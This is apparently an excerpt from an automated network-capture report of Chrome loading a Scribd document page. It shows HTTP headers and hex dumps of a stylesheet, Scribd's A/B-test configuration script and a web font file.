                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 72 6f 66 69 6c 65 5f 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 61 30 31 22 7d 2e 69 63 6f 6e 2d 44 53 32 5f 41 63 74 69 6f 6e 41 72 72 6f 77 42 61 63 6b 5f 32 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 61 30 32 22 7d 2e 69 63 6f 6e 2d 44 53 32 5f 41 63 74 69 6f 6e 41 72 72 6f 77 46 6f 72 77 61 72 64 5f 32 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 61 30 33 22 7d 2e 69 63 6f 6e 2d 44 53 32 5f 41 72 72 6f 77 4c 61 72 67 65 46 6f 72 77 61 72 64 5f 32 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 61 30 34 22 7d 2e 69 63 6f 6e 2d 44 53 32 5f 43 6c 6f 73 65 5f 32 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 61 30 35 22 7d 2e 69 63 6f 6e 2d 44 53 32 5f 4c 61 6e 67 75 61 67 65 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rofile_16:before{content:"\ea01"}.icon-DS2_ActionArrowBack_24:before{content:"\ea02"}.icon-DS2_ActionArrowForward_24:before{content:"\ea03"}.icon-DS2_ArrowLargeForward_24:before{content:"\ea04"}.icon-DS2_Close_24:before{content:"\ea05"}.icon-DS2_Language_


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        1192.168.2.1649711151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC700OUTGET /options/exposed_to_client.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:15 UTC936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3980
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"2202a3c15cede83c0da1d558d5fe798f"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 7
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: bf4b87221003d4842d3da0e945b40fc36480ab43aec82673fbb2aa0160e253f5
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.005354
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890092-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522355.871723,VS0,VE79
                                                                                                                                                                                                                                                                                                                                                                                        Vary: X-Language-Locale,Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:15 UTC1378INData Raw: 0a 20 20 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 53 63 72 69 62 64 29 20 53 63 72 69 62 64 20 3d 20 7b 7d 3b 0a 20 20 20 20 20 20 53 63 72 69 62 64 2e 42 72 61 6e 64 20 3d 20 27 73 63 72 69 62 64 27 3b 0a 20 20 20 20 20 20 53 63 72 69 62 64 2e 4e 77 61 79 54 65 73 74 73 57 69 74 68 57 65 69 67 68 74 73 20 3d 20 7b 22 64 6f 63 5f 70 61 67 65 5f 70 61 73 73 5f 68 61 73 68 65 64 5f 65 6d 61 69 6c 5f 32 30 32 34 5f 71 31 22 3a 7b 22 69 64 22 3a 32 37 31 37 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 36 39 30 32 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 35 30 7d 2c 22 36 39 30 33 22 3a 7b 22 6e 61 6d 65 22 3a 22 74 65 73 74 22 2c 22 77 65 69 67 68 74 22 3a 35 30 7d 7d 7d 2c 22 64 6f 63 5f 70 61 67 65 5f 70 6d 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: if (!window.Scribd) Scribd = {}; Scribd.Brand = 'scribd'; Scribd.NwayTestsWithWeights = {"doc_page_pass_hashed_email_2024_q1":{"id":2717,"choices":{"6902":{"name":"control","weight":50},"6903":{"name":"test","weight":50}}},"doc_page_pmp
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:15 UTC1378INData Raw: 73 73 5f 32 30 32 34 5f 71 33 22 3a 7b 22 69 64 22 3a 33 30 34 37 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 37 39 39 36 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 31 7d 2c 22 37 39 39 37 22 3a 7b 22 6e 61 6d 65 22 3a 22 6e 6f 5f 70 72 6f 6d 6f 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 37 39 39 38 22 3a 7b 22 6e 61 6d 65 22 3a 22 6d 6f 72 65 5f 70 72 6f 6d 6f 22 2c 22 77 65 69 67 68 74 22 3a 39 39 39 39 39 7d 7d 7d 2c 22 64 6f 63 5f 70 61 67 65 5f 61 64 5f 6c 61 62 65 6c 73 5f 76 32 22 3a 7b 22 69 64 22 3a 33 30 37 37 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 38 30 38 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 39 39 39 39 39 7d 2c 22 38 30 38 31 22 3a 7b 22 6e 61 6d 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ss_2024_q3":{"id":3047,"choices":{"7996":{"name":"control","weight":1},"7997":{"name":"no_promo","weight":0},"7998":{"name":"more_promo","weight":99999}}},"doc_page_ad_labels_v2":{"id":3077,"choices":{"8080":{"name":"control","weight":99999},"8081":{"name
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:15 UTC1224INData Raw: 32 33 33 39 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 35 38 31 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 35 38 31 31 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 5f 6e 6f 5f 66 61 6c 6c 62 61 63 6b 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 35 38 31 32 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 65 6e 74 5f 6d 6f 64 65 6c 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 35 38 31 33 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 65 6e 74 5f 6d 6f 64 65 6c 5f 32 22 2c 22 77 65 69 67 68 74 22 3a 31 30 30 7d 7d 7d 2c 22 72 65 63 73 5f 64 6f 63 5f 70 61 67 65 5f 70 6d 70 5f 71 31 32 33 5f 63 22 3a 7b 22 69 64 22 3a 32 34 30 36 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 36 30 32 31 22 3a 7b 22 6e 61 6d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2339,"choices":{"5810":{"name":"control","weight":0},"5811":{"name":"control_no_fallback","weight":0},"5812":{"name":"content_model","weight":0},"5813":{"name":"content_model_2","weight":100}}},"recs_doc_page_pmp_q123_c":{"id":2406,"choices":{"6021":{"nam


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        2192.168.2.1649716151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC634OUTGET /webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 15956
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 22:09:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "9b771916b86a74a18a8bfc828256abe1"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2112508
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740029-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 8309
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522357.501314,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 77 4f 46 32 00 01 00 00 00 00 3e 54 00 11 00 00 00 00 9f 28 00 00 3d f2 00 02 05 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 46 1b b5 28 1c 86 20 06 60 00 90 00 08 2a 09 82 73 11 08 0a 81 d7 30 81 bb 76 01 36 02 24 03 89 10 0b 84 4a 00 04 20 05 84 72 07 20 0c 56 1b fa 8d 25 dc f5 dd ad aa 14 0d 58 92 15 4c b7 c9 cb ed 20 54 09 f1 8e 91 08 3d 0e 18 b6 a5 8a ff ff 9e dc 18 22 d2 0e 6a b5 b6 ff 50 34 1c c4 94 82 51 5d c8 9a ea 0a ab e3 4e 18 5b 13 89 ce 55 a8 24 86 8b 58 3b 1d 6e 2c 24 3f 5c 37 33 c4 84 66 6a 6e fe 0c bc 54 10 eb 01 5d 76 e2 51 68 88 7c 35 9e 1a cd 34 3b 41 ac 1e c5 65 67 c3 fc 8d 4a 41 b1 cc 36 59 6c d1 64 9a 74 7f b0 e2 ef 1f 8c 23 2a 0d 6a e8 f8 9a 33 b0 6d e4 4f 72 f2 f2 f0 fc ff 59 fd da e7 a6 d8 d6 49 35 a8 54 d3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wOF2>T(=`F( `*s0v6$J r V%XL T="jP4Q]N[U$X;n,$?\73fjnT]vQh|54;AegJA6Yldt#*j3mOrYI5T
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 4d 99 d6 8a e9 95 e2 c9 2b 57 7e ac 31 91 7a 8b 94 e9 46 5c 6b 0e c7 f5 00 26 1b cf bc d7 fb 8e 85 a7 64 2c b8 61 ba b8 f3 e3 60 38 37 1f 54 ed 40 4b 47 ec b1 69 d0 30 3a 5f 39 c6 e2 e5 d4 a6 ae 39 59 06 99 e9 f2 8f a3 a5 18 e7 47 7e 88 87 86 40 a7 cc a3 bf 01 b6 f4 c7 d3 b0 42 e8 4c 3a 59 f6 26 c6 4b 5d 1d a7 cc bd 6f 57 3c c3 7c 18 81 5c 23 34 9d d7 80 c4 e3 75 0e 2d 76 eb f6 2f 0f a7 7c 68 bf fe 3a e7 fe d7 4e 97 eb 4c bb 62 8e 86 21 1a d6 8f 86 59 e3 39 45 11 e0 98 91 7d 4f ba 7f c2 fb 98 3d ee bb 03 4e 87 82 15 c2 72 32 f9 f9 eb 4c 3e 82 a2 83 a9 da 63 4d 42 42 c7 04 10 30 09 b3 0a 0c b9 6d fe e9 d6 47 72 31 e5 4d b6 de f9 e0 ca d2 ad 85 6f 38 a3 62 47 60 ac 77 a8 cb b8 2a 96 21 83 f9 1b 5d ee 98 99 76 ae 9f 7a 5a cf 8d f2 67 92 cc 8b 74 9e 07 00 ad
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: M+W~1zF\k&d,a`87T@KGi0:_99YG~@BL:Y&K]oW<|\#4u-v/|h:NLb!Y9E}O=Nr2L>cMBB0mGr1Mo8bG`w*!]vzZgt
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: d6 bf ed ce 54 1b 3d 07 32 d7 01 cf f6 ac bb b3 9e 29 56 a5 a5 25 5b fa fb 29 51 ad 4e ab fb 17 2b 55 a3 5e db af b6 44 99 5a 0d e4 da 4f 1b 7b e1 f9 ee d9 8d fe 13 ba 47 db 43 5b fc c3 d9 67 9e ec 99 67 ba f0 d4 f3 bc b4 85 3f 5e 7e fe 25 de e8 07 26 50 b7 78 a2 c7 8a 16 17 84 ab 27 a4 2a a9 8c 3a c2 39 21 24 9d ef b6 19 64 a1 c4 39 3a 5f b5 f1 d7 a7 86 95 7b d9 4d b7 dc 76 c7 5d f7 dc f7 c0 43 8f 0d 1a f0 48 0f 3b 0e e6 47 9d 71 56 bf 73 ce bb e0 a2 4b 2e bb e6 ba 2b ae 0a 45 ed e3 70 f0 92 cb 95 ba a3 4e f3 1a 92 72 a1 94 6d 5a f7 24 aa 11 ad 19 cc 56 74 c7 cb 1e 26 15 44 1c e5 e6 fd 77 a0 1e 75 fd e4 bf f3 4a 0c 86 7e d7 ed 22 34 00 64 34 72 c8 a6 e6 a3 2e 73 7b 38 e8 57 a2 69 15 fb eb 33 32 95 ea ed 89 51 b0 da 8d 52 d8 03 65 45 10 8a 31 bc 41 8d ca
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: T=2)V%[)QN+U^DZO{GC[gg?^~%&Px'*:9!$d9:_{Mv]CH;GqVsK.+EpNrmZ$Vt&DwuJ~"4d4r.s{8Wi32QReE1A
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: da 02 13 66 d0 7f 47 ec a7 65 11 c5 23 4c bb 08 24 81 38 61 5b 6d 3a 4b 3f ee 28 5a 5a 76 96 ed 49 b7 3c 47 3a 6a 9a a0 69 d5 37 0b 74 2e 92 e3 c1 fc 04 9e c5 21 4e 91 ec 44 22 5b 11 21 53 9d 3a bd 93 e3 15 cb c1 86 0e 2f 9e 6d 3a b1 b8 57 3b 2d f9 a8 b6 da 79 24 41 d9 40 7a ce b9 3e 96 65 1a 4e ed 4c 45 b4 75 41 3c 17 62 4a 84 92 1b 85 bd a6 43 fe 78 df ad c8 97 4e dc e1 8d 99 1a 27 3b 55 b9 a9 b0 bd 28 1f b8 b4 c0 ca 29 1d 12 b6 a1 f2 85 4d 6f 35 45 f3 39 ec 25 75 4d 92 64 c2 6a 2f 6e 59 86 5b 29 b7 39 7b b0 2a 2a bf 3d 3c df 9e 8c 51 a9 1e ee 24 f2 6a 34 76 63 9c 19 55 4a 15 55 dd 9e 4e d3 94 31 8c 45 de 0a d3 dd 91 f3 5b 77 f0 15 58 55 ba 07 58 63 3c aa 3c 1f c4 ce df be fc 1d b6 c3 4a 89 76 9f d0 65 a7 ec a4 b4 ea 1c 86 1a 91 ab bd 71 ca 4f c7 e1 1e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fGe#L$8a[m:K?(ZZvI<G:ji7t.!ND"[!S:/m:W;-y$A@z>eNLEuA<bJCxN';U()Mo5E9%uMdj/nY[)9{**=<Q$j4vcUJUN1E[wXUXc<<JveqO
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: b5 ff dd b8 8a bf 30 30 32 ec 1d 05 63 4f ce e5 7e be 96 55 67 ff 33 83 b8 8f 0f 0f ba e6 9e 6f 8c c2 61 05 1a a5 55 d5 98 84 e6 a8 cf f5 70 db 22 68 8b cd 9f 46 03 cc e0 56 f6 d0 a2 36 04 4b 4d 2d db a8 be d1 e2 d3 24 d5 00 9a 27 ba 0f 02 20 73 36 5b 25 38 52 12 eb 0f 2a 68 53 1e f4 79 d4 25 17 6a 99 c2 f5 63 84 1d 50 da 08 e5 e8 a6 8c 1f d1 8d 70 1c d1 1b 18 d3 cd 35 49 12 d7 02 a7 0d 39 1b cb a5 d1 f0 62 a8 49 d5 7c 36 98 cf ef b0 54 e8 bc 57 e3 03 3b 1f 85 aa a9 af 30 75 49 dd 5a c8 f8 91 e2 c4 84 c6 2c 03 62 07 8e 81 38 27 16 6e b7 96 0d ac ad c6 87 61 76 17 5d 33 80 7f 00 ac a1 65 93 37 8a 0b 6a c4 05 19 7a b5 db ce 91 64 d2 75 7d 7b f3 5c 75 0e f2 e8 bf ac e5 5d eb 9d ef 3a 88 90 9a a1 3e 66 ef 28 8a 30 e5 e3 f6 12 7d 12 36 5a 7b 60 2d 1b 13 8d d7
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 002cO~Ug3oaUp"hFV6KM-$' s6[%8R*hSy%jcPp5I9bI|6TW;0uIZ,b8'nav]3e7jzdu}{\u]:>f(0}6Z{`-
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 9a cc 88 2b 52 a9 71 c5 12 93 9d 2e 10 5a 18 6f 6f d4 16 89 94 d9 1d 5b 56 6f e8 de 90 c6 9c ec f2 d6 71 ed 5e 83 a3 a1 7e e1 b4 69 f5 b3 1b 1c 32 62 a5 c9 66 e6 e5 8f 96 8f af 44 16 d7 b9 4f d8 a3 4f e6 4f 0c 43 0e a8 ab e5 b9 fc 9c e6 74 37 77 9a 3b 30 96 af a3 b4 0e 39 1f dd 5a a8 a3 8a c5 6e 9a c2 48 f8 7c 57 2c 37 a5 d3 65 d4 bf 45 bb 16 9b ee 24 be ae 80 5c e3 52 99 09 a2 04 6f 87 57 26 92 d9 74 e3 1d f4 1b e0 14 65 e5 cf fe 7a aa 4c a2 75 9c f5 5e 81 12 ed dd 46 22 87 b8 4a 5b 58 9c 35 ff e2 c7 97 2b f2 4e 7a c7 cd b9 5a b6 92 23 5a ca 22 a5 d3 f2 0e 20 8c 07 80 03 89 cf 57 38 25 af ac 23 ad 8a 1b 51 c5 01 24 cb a7 64 2a 3a 32 07 00 27 3c fe 68 57 e5 65 77 f8 5f ae 33 cf 07 c8 e1 d5 d2 4c 77 87 ff df f5 e6 79 80 28 bc 5c 1a c8 71 80 ea 72 81 2d c8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +Rq.Zoo[Voq^~i2bfDOOOCt7w;09ZnH|W,7eE$\RoW&tezLu^F"J[X5+NzZ#Z" W8%#Q$d*:2'<hWew_3Lwy(\qr-
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 11 c8 04 bb 4b 2b a1 ac 2d dc a8 39 c2 90 76 41 66 ef de 7f 7c 39 09 5d 08 4b 27 d0 09 b7 74 e5 24 64 ec fa 47 bb 69 de 3f 5e 0b aa 3e 5a 57 04 d4 c5 ea 67 da 51 e9 0e d4 ac 38 5d 1d 50 17 ad ab 37 a3 d2 66 fe 53 6a 02 66 c5 18 e6 00 8d b1 c6 a5 86 b0 9c 98 8d 5f 97 3e c9 d2 56 77 4d 3c 09 74 05 bb 92 ab fd 4b 5f 6f 78 9f 65 1e 77 7a dd 4d e0 d4 e4 1e dd 38 5b d6 d5 f8 c3 87 63 b5 75 d2 48 c8 fe b2 eb c4 90 af 38 6a 1f ca fc 23 b0 39 c1 b2 c9 1f 95 de 13 7d f2 6b df 24 0b 91 fb 7d fc df 06 a7 ff cc 8e 34 98 c8 13 52 9b 76 3b 01 69 b5 fb cf 40 fb 3a 33 e2 f2 53 cb d3 57 24 4b e3 6f 97 8b 7f 9d 9a 06 56 9a b5 1a cf 0d 53 f6 4b 72 23 bf ae 59 69 51 ab d2 af 1b 83 9f c9 f5 56 b2 5f e3 bb 5f 18 e7 f9 4e 6c a4 3b 39 fa c4 e3 76 f6 7f 0f 85 71 ee ef 84 26 e4 b4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K+-9vAf|9]K't$dGi?^>ZWgQ8]P7fSjf_>VwM<tK_oxewzM8[cuH8j#9}k$}4Rv;i@:3SW$KoVSKr#YiQV__Nl;9vq&
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 1e 35 29 24 2f 33 24 6f d4 24 ec b5 9e 12 ae fc c8 86 52 6a 4a 2c 0e fa c9 3e 37 b0 f8 4f d4 a6 d3 fe 98 9b 63 70 63 b0 ac 91 42 f2 de ea e7 ef bc 7c 85 33 db eb 20 37 09 c6 86 a0 c4 e4 6b e8 d1 58 fc 68 f4 27 ee 84 6e 9f ac e0 4d d1 66 fe 76 ff a7 1c 8b 61 fd 5f 44 de 50 fd e9 ad 57 00 29 ec f7 83 8a f7 c6 6e 0b cd 09 3e 91 c3 47 1d 9c b0 8b 10 cd 4d 95 05 54 e3 83 41 88 14 9e 18 89 c6 3c 8c f6 ed 2d 0b 5a 39 a4 11 f0 8f 28 cc 00 12 4f e0 a6 ca fd d1 87 75 f3 d7 aa 65 7f 55 d3 ba a6 0d 60 50 c7 f1 04 b3 bc 05 27 cb 82 ac fb 9a 21 4d 34 eb 91 b2 4d 59 d0 65 b0 b9 62 55 1b 72 dc 30 76 bb 57 dc ab 3a 24 62 e6 2b 1c 76 b9 e1 19 20 f8 5a f1 50 11 0d de c7 e2 cf 66 0c 6a 4b d5 13 0b 94 83 d2 31 63 3a 02 62 62 44 e2 ae a2 6f ed 53 95 98 06 e6 cc 31 3d 54 95 32
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5)$/3$o$RjJ,>7OcpcB|3 7kXh'nMfva_DPW)n>GMTA<-Z9(OueU`P'!M4MYebUr0vW:$b+v ZPfjK1c:bbDoS1=T2
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 30 8d 27 32 70 e6 cf e2 79 38 b2 7c 79 c5 a8 d8 6f 53 31 a5 a9 d5 6d 46 0c 33 55 6e d2 9c 12 97 02 22 cc ef cc 6e 9f 33 e2 0c 0e 73 47 f6 d3 2c 62 f9 da 69 2c 56 f3 ba 32 22 b1 6c 5d 33 8b 35 6d 6d f9 9f 10 4f 2b 95 3f 86 a0 61 b9 94 af 45 6e dd 8d 3e 4e 52 e3 09 6a f2 71 34 fa 38 59 4d c0 ab 49 c7 5b c9 1b a8 f4 0d 64 f2 06 3a 75 03 d2 54 de a7 d1 86 b3 a9 54 28 5c a3 eb 33 98 de 6b f0 4b 8b 0c a6 3e ad 2e 3c 99 4a 55 86 6b b5 7d 06 63 f1 52 bc f6 9f b1 08 54 e7 3b 12 81 40 7a d7 89 42 1d e4 ef f5 41 d6 c0 98 92 f7 59 d0 97 e0 67 27 83 9f 54 21 60 cd b9 6d 25 3f 68 13 19 d2 82 ba c8 b2 d4 b9 5b 3d 7b f7 fe 63 2e 36 3f 93 4b 6b bd 6e 25 3d 62 19 e5 56 4f 8e e5 71 88 9e 2d 17 73 e4 f9 ca 98 64 5e a9 54 1f 36 7a 53 14 09 c2 18 62 0d 68 48 6e 87 36 7d 63 7c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0'2py8|yoS1mF3Un"n3sG,bi,V2"l]35mmO+?aEn>NRjq48YMI[d:uTT(\3kK>.<JUk}cRT;@zBAYg'T!`m%?h[={c.6?Kkn%=bVOq-sd^T6zSbhHn6}c|
